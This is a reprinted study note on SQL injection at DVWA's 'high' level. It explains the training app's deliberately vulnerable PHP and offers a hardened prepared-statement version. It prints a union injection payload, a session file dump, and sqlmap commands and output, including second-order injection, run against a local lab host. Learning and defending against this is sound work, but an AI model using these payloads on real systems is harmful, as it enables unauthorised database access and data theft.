2019-2-26 DVWA study notes (3): SQL injection at the high level, and sessions


Continue by setting the DVWA security level to high and look at the interface.
On the high-level page, clicking "here to change your ID" opens a separate window (session-input.php); entering 3 there and submitting makes the data appear on the main page.
High feels much like low; the only difference is that the submission and the display of the result are on different pages.
First try the same attack that worked at the low level.
The injection succeeds here as well, which shows that high is also a string-type injection.
Let's walk through the execution flow in the source code.
Step 1. /var/www/html/vulnerabilities/sqli/index.php

 $page[ 'body' ] .= "Click <a href=\"#\" onclick=\"javascript:popUp('session-input.php');return false;\">here to change your ID</a>.";

The code above means that clicking "here to change your ID" opens the session-input.php page.

Step 2. /var/www/html/vulnerabilities/sqli/session-input.php

<?php

define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php';

dvwaPageStartup( array( 'authenticated', 'phpids' ) );

$page = dvwaPageNewGrab();
$page[ 'title' ] = 'SQL Injection Session Input' . $page[ 'title_separator' ].$page[ 'title' ];

if( isset( $_POST[ 'id' ] ) ) {
        $_SESSION[ 'id' ] =  $_POST[ 'id' ];
        //$page[ 'body' ] .= "Session ID set!<br /><br /><br />";
        $page[ 'body' ] .= "Session ID: {$_SESSION[ 'id' ]}<br /><br /><br />";
        $page[ 'body' ] .= "<script>window.opener.location.reload(true);</script>";
}

$page[ 'body' ] .= "
<form action=\"#\" method=\"POST\">
        <input type=\"text\" size=\"15\" name=\"id\">
        <input type=\"submit\" name=\"Submit\" value=\"Submit\">
</form>
<hr />
<br />

<button onclick=\"self.close();\">Close</button>";

dvwaSourceHtmlEcho( $page );

?>

Brief notes
1. This page submits its form to itself (action="#").
2. After submission, PHP's predefined $_POST array collects the form's id field.
3. If $_POST['id'] is set, it is assigned to the predefined $_SESSION['id']; session data is kept on the server. Note: at this point what the session holds is the following:

1' union select column_name,column_type from information_schema.columns where table_name='users' and table_schema='dvwa'#

The session data stored on the server can be seen below:

root@1cae08f0d608:/var/lib/php/sessions# ls -l
total 4
-rw------- 1 www-data www-data 246 Feb 27 01:09 sess_mtnslp6slj5aup7n1tqh2ouc72
root@1cae08f0d608:/var/lib/php/sessions# cat sess_mtnslp6slj5aup7n1tqh2ouc72
dvwa|a:2:{s:8:"messages";a:0:{}s:8:"username";s:5:"admin";}id|s:121:"1' union select column_name,column_type from information_schema.columns where table_name='users' and table_schema='dvwa'#";session_token|s:32:"b6bc30f8d87d2e146baaff5e5a1c

4. The page displays Session ID: <the session content>.
5. Finally the parent window, i.e. /var/www/html/vulnerabilities/sqli/index.php, is reloaded.

Step 3. /var/www/html/vulnerabilities/sqli/index.php
Here high.php is executed (it was already loaded in step 1 via require_once):

require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/sqli/source/{$vulnerabilityFile}";

Step 4. /var/www/html/vulnerabilities/sqli/source/high.php

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
        // Get input
        $id = $_SESSION[ 'id' ];

        // Check database
        $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
        $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

        // Get results
        while( $row = mysqli_fetch_assoc( $result ) ) {
                // Get values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                $html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
        }

        ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

Here, as long as $_SESSION['id'] exists, the database query runs. In step 1, $_SESSION['id'] does not exist yet, so nothing runs; in step 2, session-input.php stores $_SESSION['id'], and from then on the query is executed.
The high-level query is actually less safe than the medium level: it does not escape special characters with mysqli_real_escape_string at all. It only uses "LIMIT 1" to cap the number of rows displayed, which is trivially neutralized by a "#" injected into the input.

That is the whole execution flow of the code; I honestly don't understand why this level is classified as high.
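For contrast, here is a hardened rewrite of the high.php query. This is an added example, not DVWA's own code; it keeps the $_SESSION['id'] input and the $GLOBALS["___mysqli_ston"] connection from the snippet above and replaces string interpolation with a whitelisted integer bound through a prepared statement.

```php
<?php
// Added example: hardened version of the high.php query (not DVWA's code).
// Assumes the same $_SESSION['id'] input and $GLOBALS["___mysqli_ston"] connection.

// Accept only a positive integer; everything else is rejected before it reaches SQL.
function validate_user_id($raw) {
    if (!is_string($raw) && !is_int($raw)) {
        return null;
    }
    $raw = (string)$raw;
    if (!ctype_digit($raw) || strlen($raw) > 10) {
        return null;
    }
    return (int)$raw;
}

if (isset($_SESSION['id'])) {
    $id = validate_user_id($_SESSION['id']);
    if ($id === null) {
        // The union payload stored in the session above fails this check and never reaches MySQL.
        $html .= '<pre>Invalid user ID.</pre>';
    } else {
        $db = $GLOBALS["___mysqli_ston"];
        // Bind the value as an integer parameter: a quote or '#' in the input cannot alter the query.
        $stmt = mysqli_prepare($db, 'SELECT first_name, last_name FROM users WHERE user_id = ? LIMIT 1');
        if ($stmt === false) {
            $html .= '<pre>Something went wrong.</pre>';
        } else {
            mysqli_stmt_bind_param($stmt, 'i', $id);
            mysqli_stmt_execute($stmt);
            mysqli_stmt_bind_result($stmt, $first, $last);
            while (mysqli_stmt_fetch($stmt)) {
                // Encode output so a stored name cannot inject HTML either.
                $html .= '<pre>ID: ' . htmlspecialchars((string)$id, ENT_QUOTES, 'UTF-8')
                       . '<br />First name: ' . htmlspecialchars($first, ENT_QUOTES, 'UTF-8')
                       . '<br />Surname: ' . htmlspecialchars($last, ENT_QUOTES, 'UTF-8') . '</pre>';
            }
            mysqli_stmt_close($stmt);
        }
        mysqli_close($db);
    }
}
?>
```

With this version the session can still hold the union payload shown earlier, but the page answers "Invalid user ID." instead of running it.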

Next, let's test an attack with sqlmap.

Open the developer tools on session-input.php to obtain the cookie.

Now try attacking the same way as before, fetching all table names; the POST body goes in the --data parameter:

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.99.100/vulnerabilities/sqli/" --data "id=1 & Submit=Submit " --cookie "PHPSESSID=mtnslp6slj5aup7n1tqh2ouc72; security=high" --batch -D dvwa --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.3.2.22#dev}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:14:27 /2019-02-26/

[17:14:27] [INFO] resuming back-end DBMS 'mysql'
[17:14:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (1426=1426) THEN 1 ELSE (SELECT 4462 UNION SELECT 4808) END))&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 5505 FROM(SELECT COUNT(*),CONCAT(0x71786a6271,(SELECT (ELT(5505=5505,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x71786a6271,0x597353525655566d6d4577594e7a79776b7863416a6e6d4c50654f50676d457a4979794759456458,0x717a6b6b71),NULL-- HLAr&Submit=Submit
---
[17:14:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0
[17:14:27] [INFO] fetching tables for database: 'dvwa'
[17:14:27] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[17:14:27] [WARNING] the SQL query provided does not return any output
[17:14:27] [WARNING] the SQL query provided does not return any output
[17:14:27] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[17:14:27] [WARNING] the SQL query provided does not return any output
[17:14:27] [WARNING] the SQL query provided does not return any output
[17:14:27] [INFO] fetching number of tables for database 'dvwa'
[17:14:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[17:14:27] [INFO] retrieved:
[17:14:27] [WARNING] time-based comparison requires larger statistical model, please wait............ (done)
[17:14:27] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[17:14:27] [WARNING] unable to retrieve the number of tables for database 'dvwa'
[17:14:28] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
No tables found
[17:14:28] [INFO] fetched data logged to text files under 'C:\Users\xxx\AppData\Local\sqlmap\output\192.168.99.100'

[*] ending @ 17:14:28 /2019-02-26/

It failed.
I looked up guides online; the explanation is as follows:

When the query data is submitted on one page and the result is displayed on another, a single sqlmap command has to include the URLs and other key information of both pages. In that case sqlmap needs the --second-order parameter (which sets the URL of the page that displays the second-order response).

Some sites also call second-order "second-order SQL injection". Sometimes the result of the data entered at the injection point is not shown on the current page but on a different one, so you have to tell sqlmap which page to fetch in order to judge true/false responses.
--second-order takes the URL of the page used for that judgement.
Trying it (the sqlmap build used here accepts the option as --second-url):

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.99.100/vulnerabilities/sqli/session-input.php" --second-url "http://192.168.99.100/vulnerabilities/sqli/" --data "id=1 & Submit=Submit " --cookie "PHPSESSID=mtnslp6slj5aup7n1tqh2ouc72; security=high" -D dvwa -T users --tables --batch
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.2.22#dev}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:48:31 /2019-02-27/

[15:48:32] [INFO] resuming back-end DBMS 'mysql'
[15:48:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=a'' ' UNION ALL SELECT CONCAT(CONCAT('qkzpq','AnAobpxMEVvrQhDbPUwYvCTponUepPqCpwoBwMDl'),'qpqqq'),NULL-- weNx& Submit=Submit
---
[15:48:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL 5 (MariaDB fork)
[15:48:32] [INFO] fetching tables for database: 'dvwa'
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[15:48:32] [INFO] fetched data logged to text files under 'C:\Users\xxx\AppData\Local\sqlmap\output\192.168.99.100'

[*] ending @ 15:48:32 /2019-02-27/

Success.


Reprinted from blog.csdn.net/weixin_42555985/article/details/87939341